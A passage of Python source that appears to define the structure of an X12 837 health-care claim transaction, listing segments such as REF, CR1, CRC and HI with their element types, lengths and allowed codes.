), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Medical Record Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EA"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Demonstration Project Identifier", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["P4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Care Plan Oversight", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["1J"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", 
req_sit="N", seq="04" ), ), ), Segment( "K3", Properties( desc="File Information", position="1850", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Claim Note", position="1900", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "CER", "DCP", "DGN", "TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="1950", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", 
Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR2", Properties( desc="Spinal Manipulation Service Information", position="2000", repeat="1", req_sit="S", syntax="P0102 C0403 P0506", ), Element( "CR201", Properties( desc="Count", req_sit="N", data_type=("N0", "1", "9"), position=1, codes=[], ), ), Element( "CR202", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=2, codes=[], ), ), Element( "CR203", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=3, codes=[], ), ), Element( "CR204", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CR205", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=5, codes=[], ), ), Element( "CR206", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR207", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CR208", Properties( desc="Nature of Condition Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["A", "C", "D", "E", "F", "G", "M"], ), ), Element( "CR209", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=9, codes=[], ), ), Element( "CR210", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), Element( "CR211", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=11, codes=[], ), ), Element( "CR212", Properties( desc="Yes/No Condition or Response Code", req_sit="N", 
data_type=("ID", "1", "1"), position=12, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance Certification", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Patient Condition Information: Vision", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["E1", "E2", "E3"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, 
codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["L1", "L2", "L3", "L4", "L5"], ), ), ), Segment( "CRC", Properties( desc="Homebound Indicator", position="2200", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["75"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["IH"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="EPSDT Referral", position="2200", repeat="1", req_sit="S", syntax="" ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["ZZ"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", 
data_type=("ID", "2", "3"), position=3, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "HI", Properties( desc="Health Care Diagnosis Code", position="2310", repeat="1", req_sit="R", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABK", "BK"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", 
data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, 
codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health 
Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", 
"18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( 
desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", 
data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", 
"BF"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI11-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version 
Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HI", Properties( desc="Anesthesia Related Procedure", position="2310", repeat="1", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BP"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, 
codes=["BO"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="03", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="04", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="06", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="07", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="08", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="09", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", 
seq="10", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="11", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="12", ), ), ), Segment( "HI", Properties( desc="Condition Information", position="2310", repeat="2", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", 
